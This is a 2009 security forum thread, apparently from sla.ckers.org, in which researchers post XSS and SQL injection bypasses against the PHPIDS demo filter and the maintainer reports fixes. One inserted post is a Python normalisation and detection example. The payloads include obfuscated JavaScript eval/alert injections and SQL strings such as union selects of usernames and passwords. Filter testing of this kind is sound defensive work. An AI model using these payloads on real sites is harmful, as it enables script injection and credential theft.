Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 11:38AM

Really nice fix btw! I almost doubted that you'd be able to fix that last one.
anyways here is a new one :D

slackers didn't accept the chars:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=dGhpcyAuZmRnc2RmZ3NkZmdkc2ZnZHNmZwp0aGlzIC5mZGdzZGZnc2RmZ2RzZmdkc2ZnCnRoaXMgLmZkZ3NkZmdzZGZnZHNmZ2RzZmcKdGhpcyAuZmRnc2RmZ3NkZmdkc2ZnZHNmZwp0aGlzIC5mZGdzZGZnc2RmZ2RzZmdkc2ZnCmFhYWFhYWFhYWFhYWFhYWE6KGFsZXJ0fHw8QGZyb21jaGFyY29kZXNfMj4xMDAwLDEwMDEsMTAwMiwxMDAzLDEwMDQsMTAwNSwxMDA2LDEwMDcsMTAwODxAL2Zyb21jaGFyY29kZXNfMj4pKDEpfHw8QGZyb21jaGFyY29kZXNfMz4xMDAwLDEwMDEsMTAwMiwxMDAzLDEwMDQsMTAwNSwxMDA2LDEwMDcsMTAwODxAL2Zyb21jaGFyY29kZXNfMz4%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 02/09/2009 11:40AM by Gareth Heyes.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 12:14PM

Bloody emoticons!

It also works without the special chars :) Nice one and - well - did I mention already that Gecko's JS parser is completely nuts? ;)

Firefox btw suggests "satisfactoriness" when trying to spell check the vector - smarter browser than I thought...

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 12:26PM

@mario

That vector should work in any parser ;) maybe js in general is nuts :)

May I suggest you have some form of javascript token scanning, some unicode characters can and can't be used as js variables. You could then use a unicode range regexp to find the ones that are valid and if it looks like valid javascript block it.

This Hackvertor tag scans variables in IE/Firefox (I haven't got round to looking up the error object in the others yet)
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBqc3ZhcmlhYmxlXzAoMTAwMCwgMTEwMCkgLz4%3D

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 02:08PM

Hm - the Converter should transform Unicode to ascii placeholders so those characters won't hit the rules.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 09, 2009 06:16PM

Hmmm the converter doesn't take into account illegal characters:-

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEByZXBlYXRfMig1KT48QGZyb21jaGFyY29kZXNfMT45MDAwPEAvZnJvbWNoYXJjb2Rlc18xPjxAL3JlcGVhdF8yPj1hbGVydAo8QHJlcGVhdF8zKDUpPjxAZnJvbWNoYXJjb2Rlc180PjkwMDA8QC9mcm9tY2hhcmNvZGVzXzQ%2BPEAvcmVwZWF0XzM%2BKDEp

Why raise an XSS impact if the code can't execute? I guess that's my point.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 09, 2009 06:24PM

Because you can never be sure if the current user agent will maybe execute it anyway due to whatever implementation flaws/server side issues/weak charsets?

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 10, 2009 03:34AM

Ok, fair enough, that has happened before so it makes sense.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 23, 2009 08:38AM

Totally cool real XSS injection:-

<isindex/type=image
xyz=&lt;iframe/src=javascript&amp;#x3a&amp;#x61lert&amp;#x28&amp;#x31&amp;#x29&gt;
onerror=undefined,/\//,outerHTML=xyz src=1>

Do I get a cookie? :D

Oh btw IE only




Edited 1 time(s). Last edit at 02/23/2009 08:39AM by Gareth Heyes.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 23, 2009 08:46AM

2 cookies from me. Nice!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 23, 2009 09:31AM

Thanks for the cookies but even before I've finished them it was fixed :D

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Matt Presson
Date: February 23, 2009 09:40AM

That is just crazy. One of the best, but still crazy.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: DoctorDan
Date: February 28, 2009 01:29PM

lolwut.
Gareth, haha very nice. Cookie++

-Dan

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 01, 2009 12:05AM

http://p42.us/phpids/87.html
(this)[new Array+('eva')+new Array+ 'l'](/can.you/+name+/sla.ckers.forum.script/)

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 01, 2009 06:20AM

Nice :) Just fixed it in the trunk - but couldn't update the demo yet. Will do tomorrow. Thx!

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 02, 2009 05:14PM

IE only. Tag injection again :D

http://tinyurl.com/am5vo6

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 03, 2009 04:29AM

Nice one! I added some code to deal with double encoding - even if it doesn't apply in this case. Also, undefined cannot be used as an obfuscation method anymore (although I am pretty sure it's possible to trick the new filters).

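Two normalisation steps come up in this thread: mario's remark (Feb 9) that the converter should turn Unicode into ASCII placeholders so exotic identifier characters cannot hide a call from the rules, and the double-encoding handling mentioned in the post above. The following is an added example written for this page, not PHPIDS code; the rule, the placeholder scheme and the sample input are constructed here. The identifier categories are the ones ECMAScript defines for IdentifierStart/IdentifierPart (Unicode letter categories plus marks, digits and connector punctuation), which is what Gareth's "unicode range" suggestion amounts to.

```python
import re
import unicodedata
from urllib.parse import unquote

# ECMAScript identifier classes: IdentifierStart is any Unicode letter
# (Lu Ll Lt Lm Lo Nl) plus '$' and '_'; IdentifierPart additionally allows
# combining marks (Mn Mc), decimal digits (Nd), connector punctuation (Pc)
# and the zero-width (non-)joiner code points.
_ID_START = {"Lu", "Ll", "Lt", "Lm", "Lo", "Nl"}
_ID_PART = _ID_START | {"Mn", "Mc", "Nd", "Pc"}
_ZERO_WIDTH = {"\u200c", "\u200d"}


def is_js_identifier_char(ch, start=False):
    """True if `ch` may appear in a JavaScript identifier (at the start if
    `start` is set)."""
    if ch in "$_":
        return True
    if not start and ch in _ZERO_WIDTH:
        return True
    cat = unicodedata.category(ch)
    return cat in (_ID_START if start else _ID_PART)


def percent_decode(value, max_rounds=3):
    """Undo repeated percent-encoding: '%2527' -> '%27' -> "'".
    Stops as soon as a round changes nothing, and never runs more than
    `max_rounds` rounds, so a pathological input cannot keep the
    normaliser busy."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def ascii_placeholders(value):
    """Replace every non-ASCII character by an ASCII stand-in (constructed
    scheme): characters that are legal JavaScript identifier characters become
    'u', so a run of them still reads as a name, everything else becomes '?'.
    Rules written against ASCII then see the surrounding structure."""
    out = []
    for ch in value:
        if ord(ch) < 128:
            out.append(ch)
        elif is_js_identifier_char(ch):
            out.append("u")
        else:
            out.append("?")
    return "".join(out)


def normalize(raw):
    """Converter stage: decode, then collapse Unicode to placeholders."""
    return ascii_placeholders(percent_decode(raw))


# A deliberately small, constructed rule set (not PHPIDS's rules): the first
# rule catches a parenthesised expression that is immediately called, e.g.
# "(alert||xyz)(1)", which is the shape of the Feb 9 vector once normalised.
RULES = [
    ("immediately invoked parenthesised expression",
     re.compile(r"\)\s*\(\s*[\w'\"]")),
    ("name built only from non-ASCII identifier characters is called",
     re.compile(r"(?<![A-Za-z0-9_$])u{2,}\s*\(")),
]


def inspect(raw):
    """Return the names of all rules that fire on the normalised input."""
    text = normalize(raw)
    return [name for name, rx in RULES if rx.search(text)]


# Constructed sample: "(alert||<two Coptic letters>)(1)", percent-encoded twice.
SAMPLE = "%2528alert%257C%257C%25CF%25A8%25CF%25A9%2529%25281%2529"

if __name__ == "__main__":
    print(normalize(SAMPLE))   # (alert||uu)(1)
    print(inspect(SAMPLE))
    print(inspect("hello world"))
```

Note that the raw sample contains neither a quote nor a ")(" pair, so a rule run on it before the converter stage sees nothing; only the decoded, placeholder-normalised text exposes the call structure. The round limit in percent_decode is the caveat to keep: decoding "until stable" without a bound hands an attacker a cheap way to make the IDS spend time on every request.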
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 03, 2009 04:57AM

Oh yeah, it doesn't apply hehe, I must have thought one of the other errors triggered it. It's still vulnerable though, the harmless HTML option seems weak. I don't have time to test right now but I may do some tonight.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 04, 2009 10:06AM

It's been quite a while since I've tested for some SQLi.

new one:
2' between 1 and 3 or 0x61 like 'a (php-ids)
4' MOD 2 like '0 (php-ids)
2' / 0x62 or 0 like '0 (php-ids)



Edited 2 time(s). Last edit at 03/04/2009 10:28AM by Reiners.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 04, 2009 11:46PM

Decided to give it a try, here's what I came up with:

http://demo.phpids.org/?test=a%27%20and%20username%20=%27lightos a' and username ='lightos
http://demo.phpids.org/?test=a%27%20having%201%3C1%20and%201%20like%20%27a a' having 1<1 and 1 like 'a
http://demo.phpids.org/?test=a%27%20having%201%20%20=1/%201%20and%201%20=%271 a' having 1 =1/ 1 and 1 ='1
http://demo.phpids.org/?test=1%20order%20by%201 1 order by 1
http://demo.phpids.org/?test=1%20order%20by%20ifnull(null,userid%29 1 order by ifnull(null,userid)
http://demo.phpids.org/?test=1%20order%20by%20if((0)=4%20,2,0%29 1 order by if((0)=4 ,2,0)
http://demo.phpids.org/?test=1%20order%20by%20if(1%3C2%20,uname,uid%29 1 order by if(1<2 ,uname,uid)
http://demo.phpids.org/?test=1%20having%201%20%20=1 1 having 1 =1
http://demo.phpids.org/?test=0x31%20having%201%3C1 0x31 having 1<1
http://demo.phpids.org/?test=0x31%20union%20select%20@@version,username,password%20from%20users 0x31 union select @@version,username,password from users
http://demo.phpids.org/?test=1%20and%201%20like%200%20union%20select%20@@version,username,password%20from%20users 1 and 1 like 0 union select @@version,username,password from users
http://demo.phpids.org/?test=1%20PROCEDURE%20ANALYSE(%29 1 PROCEDURE ANALYSE() ??

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 08, 2009 02:46PM

HTML5 :D Firefox beta XSS:-

<video/title=.10000/aler&#x74;(1) onload=.1/setTimeout(title)>

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 08, 2009 03:11PM

Hi!

Excuse the late answer - had too much work to do the recent days. Nice finds - some of them are pretty tricky - especially @@version ones from lightos - due to the fact that they circumvented the whole rule check. Nice work and thx!

I could fix most of them - most recent code in the trunk as usual...

Greetings,
.mario

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 08, 2009 03:18PM

@Gareth: I can't get it running w/o an impact. But nice anyway - I like the title stuff :)

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 08, 2009 06:14PM

I thought PHP-IDS doesn't take user input without special characters into account, that's why I always use SQL injections with breaking out of quotes.
If not, then there will be _tons_ of vectors, starting with basics like

1 or 1 like 1
1 union select user,pass from users

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 08, 2009 06:27PM

new bypasses:
0' between 2-1 and 4-1 or 1 like -'1
0' between 2-1 and 4-1 or 1 sounds like binary '1
0' between 2 mod 1 and 4-1 or 1 like -'1

5'-1 mod 3-1 like binary '0
2' mod 0x62 or 0 like 0 div '1

2' / 0x62 or 0 like binary '0



Edited 1 time(s). Last edit at 03/08/2009 06:30PM by Reiners.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 09, 2009 12:49AM

A couple more for the collection,

http://demo.php-ids.org/?test=-1%27%20/ID%20having%201%3C%201%20and%201%20like%201/%271 -1' /ID having 1< 1 and 1 like 1/'1
http://demo.php-ids.org/?test=-1%27%20/ID%20or%205%20=%20version()/1%20or%200x31%20=%20%272 -1' /ID or 5 = version()/1 or 0x31 = '2
http://demo.php-ids.org/?test=-1%27%20/ID%20or%205%20=%20version()/1%20and%20ID%20=%20%271 -1' /ID or 5 = version()/1 and ID = '1
http://demo.php-ids.org/?test=-1%27%20/ID%20or%20(0x6C696768746F73406C6F63616C686F7374)%20like%20user()%20or%201%20=%20%272 -1' /ID or (0x6C696768746F73406C6F63616C686F7374) like user() or 1 = '2
http://demo.php-ids.org/?test=-1%27%20/ID;%20select%201,password/0%20from%20Users%20where%20ID%20like%201/%271 -1' /ID; select 1,password/0 from Users where ID like 1/'1

This gets displayed as normal, http://demo.php-ids.org/?test=-1%27%20/ID%20or%204%20=%20version()/1%20or%201%20=%20%222 but when we change the double quotation mark to a single,
http://demo.php-ids.org/?test=-1%27%20/ID%20or%204%20=%20version()/1%20or%201%20=%20%272 the html gets displayed a little weird. Any ideas why?

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 09, 2009 06:00AM

@mario

It defo worked, I guess I must have caught something while you were updating. Well never mind I won't moan.....

http://tinyurl.com/7c7h8v

Hahahaha :)




Edited 1 time(s). Last edit at 03/09/2009 06:01AM by Gareth Heyes.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 11, 2009 11:46PM

injection:
this[('eva')+new Array + 'l'](/x.x.x/+name+/x.x/)
demo: http://p42.us/phpids/88.html

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thrill
Date: March 12, 2009 12:21AM

You know.. I'll never get tired of saying this, but you guys are just sick.. both in a good way and in a not so good way! :)

To me this reads like the early days of shellcode... on STEROIDS!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 12, 2009 10:58AM

Death by marquee

http://www.businessinfo.co.uk/labs/phpids/phpids7.html

Works on IE & FF




Edited 1 time(s). Last edit at 03/12/2009 11:01AM by Gareth Heyes.

Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 12, 2009 07:21PM

@Gareth: This is so five minutes ago (but still nice!) :)

@thornmaker, @sql-guys: Will tidy up the rules this weekend - not enough time right now. Comments will follow -thx!!!
